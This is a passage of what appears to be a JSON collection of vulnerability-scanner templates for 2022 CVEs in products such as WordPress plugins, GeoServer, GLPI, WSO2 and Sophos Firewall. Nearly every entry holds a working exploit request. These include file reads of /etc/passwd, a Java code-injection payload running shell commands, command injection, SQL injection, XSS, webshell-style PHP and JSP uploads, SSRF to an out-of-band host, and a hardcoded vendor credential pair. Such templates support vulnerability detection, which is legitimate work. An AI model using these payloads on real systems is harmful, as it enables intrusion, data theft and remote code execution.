e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-35653","info":{"name":"Moodle LTI module Reflected - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /mod/lti/auth.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nxxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src='x'onerror=alert('document_domain')>","moodle-editor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm('document_domain')</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>confirm('document_domain')</script>","Existing backups"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(header, 'wordpress_')","contains(header, 'Location')"],"condition":"and"}]}]},{"id":"CVE-2022-2535","info":{"name":"SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"searchwp-live-search-result\")"],"condition":"and"}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0658","info":{"name":"CommonsBooking < 2.6.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, \"partiallyBookedDays\") && contains(body, \"lockDays\")"],"condition":"and"}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site 